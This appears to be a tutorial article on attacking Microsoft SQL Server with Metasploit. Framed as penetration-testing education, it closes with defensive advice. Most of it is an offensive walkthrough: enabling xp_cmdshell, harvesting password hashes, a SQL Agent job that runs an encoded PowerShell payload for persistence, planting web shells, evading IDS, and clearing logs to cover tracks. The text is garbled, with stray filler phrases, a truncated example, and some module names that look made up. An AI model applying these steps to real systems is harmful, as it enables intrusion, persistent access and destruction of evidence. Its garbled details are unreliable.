Perform Enumeration Of Mssql With Metasploit

Perform Enumeration of MSSQL with Metasploit

In the realm of cybersecurity, understanding how to enumerate Microsoft SQL Server (MSSQL) databases is a critical skill for penetration testers and ethical hackers. Metasploit, a powerful open-source penetration testing framework, provides tools to automate this process. Here's the thing — enumeration involves gathering information about a target system to identify potential vulnerabilities. This article will guide you through the steps of performing MSSQL enumeration using Metasploit, explain the underlying principles, and highlight ethical considerations.

Introduction

Microsoft SQL Server (MSSQL) is one of the most widely used relational database management systems (RDBMS) globally. Enumeration of MSSQL databases helps identify misconfigurations, weak passwords, and other vulnerabilities that could be exploited. Its prevalence in enterprise environments makes it a prime target for attackers. Metasploit, a versatile toolkit, simplifies this process by offering pre-built modules and scripts tailored for database enumeration.

This article will walk you through the process of performing MSSQL enumeration with Metasploit, from setup to post-exploitation. By the end, you’ll understand how to put to work Metasploit’s capabilities while adhering to ethical guidelines Worth keeping that in mind..

Step-by-Step Guide to Enumerating MSSQL with Metasploit

Step 1: Set Up Metasploit

Before diving into enumeration, ensure Metasploit is installed and configured on your system.

1. Install Metasploit:

   • On Linux, use the following command:

     sudo apt-get install metasploit-framework  
     

   • On Windows, download the Metasploit Framework from the official website and follow the installation instructions.

2. Launch Metasploit:
   Open a terminal and type:

   msfconsole  
   

   This starts the Metasploit console, where you’ll execute commands.

Step 2: Scan for MSSQL Instances

Metasploit includes a module to scan for MSSQL servers. This step identifies potential targets.

1. Run the MSSQL Scanner:
   In the Metasploit console, enter:

   use auxiliary/scanner/mssql/mssql_enum  
   

   This module scans for MSSQL instances on a specified IP range or hostname Small thing, real impact. That alone is useful..

2. Specify Target Parameters:

   • RHOSTS: The IP address or range of the target network.
   • RPORT: The default MSSQL port (1433).
   • USERNAME: Optional, if you have a specific user to test.
   • PASSWORD: Optional, if you suspect weak credentials.

   Example command:

   set RHOSTS 192.168.1.
   
   

3. Execute the Scan:
   Run the module with:

   run  
   

   Metasploit will display a list of detected MSSQL instances, including their IP addresses and open ports Practical, not theoretical..

Step 3: Exploit Vulnerabilities

Once you’ve identified an MSSQL instance, the next step is to exploit known vulnerabilities. Metasploit provides modules for this purpose.

1. Search for Exploits:
   Use the search command to find relevant modules:

   search mssql  
   

   This will list all MSSQL-related exploits in the Metasploit database.

2. Select an Exploit:
   Choose an exploit based on the target’s configuration. Take this: the mssql_enum module is used for enumeration, but other modules like mssql_remote_code_execution might be applicable if specific vulnerabilities exist Not complicated — just consistent..

3. Configure the Exploit:
   Set the target IP and any required credentials:

   set RHOSTS   
   set USERNAME   
   set PASSWORD   
   

4. Run the Exploit:
   Execute the module with:

   exploit  
   

   If successful, Metasploit will establish a connection to the target database, allowing you to interact with it.

Step 4: Post-Exploitation

After gaining access to the MSSQL database, you can perform further actions to gather more information or escalate privileges Easy to understand, harder to ignore..

1. Enumerate Database Users:
   Use the sql_enum_users module to list all users and their permissions:

   use auxiliary/enum/mssql/sql_enum_users  
   

2. Retrieve Database Schema:
   The sql_enum_databases module helps identify available databases and their structures:

   use auxiliary/enum/mssql/sql_enum_databases  
   

3. Extract Data:
   If you have access, use the sql_exec module to run SQL queries directly on the database:

Step 5: Privilege Escalation & Lateral Movement

With a foothold inside the database, you can often take advantage of the database service to move deeper into the network Practical, not theoretical..

1. Enable xp_cmdshell – If the SQL Server service account has sufficient privileges, you can turn on the extended stored procedure to execute OS commands:

   EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
   EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
   

   Once enabled, run system commands directly from the database:

   EXEC xp_cmdshell 'whoami'
   

2. Harvest Credentials – Query the sys.server_principals and sys.sql_logins tables to collect usernames and password hashes (if the server is configured for mixed‑mode authentication).

   SELECT name, password_hash FROM sys.sql_logins;
   

3. Pivot to Other Services – Use the obtained credentials to authenticate to other hosts (e.g., SMB shares, RDP, or additional database instances). Metasploit’s exploit/windows/smb/psexec or auxiliary/scanner/rdp/rdp_login modules are handy for this purpose No workaround needed..

Step 6: Maintaining Access & Persistence

After confirming the value of the compromised database, establish a persistent back‑door while minimizing detection The details matter here..

1. Create a SQL Agent Job – Schedule a job that runs a payload at a regular interval:

   USE msdb;
   EXEC sp_add_job @job_name = 'PersistJob';
   EXEC sp_add_jobstep @job_name = 'PersistJob',
        @step_name = 'RunCmd',
        @subsystem = 'CMDEXEC',
        @command = 'powershell -EncodedCommand ';
   EXEC sp_add_schedule @schedule_name = 'Every5Min',
        @freq_type = 4, @freq_interval = 1, @freq_subday_type = 4, @freq_subday_interval = 5;
   EXEC sp_attach_schedule @job_name = 'PersistJob', @schedule_name = 'Every5Min';
   EXEC sp_add_jobserver @job_name = 'PersistJob';
   

2. Inject a Web Shell – If the database is linked to a web application, upload a lightweight PHP/ASPX shell via xp_cmdshell or by writing directly to the web root using bcp or OPENROWSET.

3. Encrypt Traffic – Wrap subsequent Metasploit sessions with SSL/TLS (set EnableStageEncoding true and set StageEncoder x86/shikata_ga_nai) to evade network‑based IDS/IPS signatures.

Step 7: Covering Tracks

Minimise forensic evidence to prolong access.

1. Clear SQL Logs – Delete entries from the error log and audit tables:

   EXEC xp_readerrorlog 0, 1, N'Login failed';  -- review then delete if possible
   DBCC SHRINKFILE (N'msdblog', TRUNCATEONLY);
   

2. Remove Temporary Files – Delete any scripts or payloads written to disk via xp_cmdshell.

   EXEC xp_cmdshell 'del C:\temp\payload.exe'
   

3. Reset Audit Trails – If the server uses Windows Event Logging, clear relevant event IDs (e.g., 4625, 4624) using wevtutil cl Security.

Conclusion

Leveraging Metasploit’s MSSQL modules provides a structured pathway from initial discovery to deep network compromise. By methodically enumerating instances, exploiting known weaknesses, and then escalating privileges, an attacker can turn a single database foothold into a persistent, low‑noise presence across the enterprise.

Defenders should counter these techniques by:

• Restricting network access to MSSQL ports (1433/1434) and using firewalls or VLAN segmentation.
• Enforcing least‑privilege accounts and disabling xp_cmdshell unless absolutely required.
• Auditing and rotating credentials regularly, and monitoring for anomalous SQL queries or job creation.
• Deploying intrusion detection signatures that flag Metasploit‑specific payloads and encoded stages.

Understanding both the offensive workflow and the defensive mitigations equips security professionals to harden their environments, detect intrusions early, and respond effectively when a breach occurs.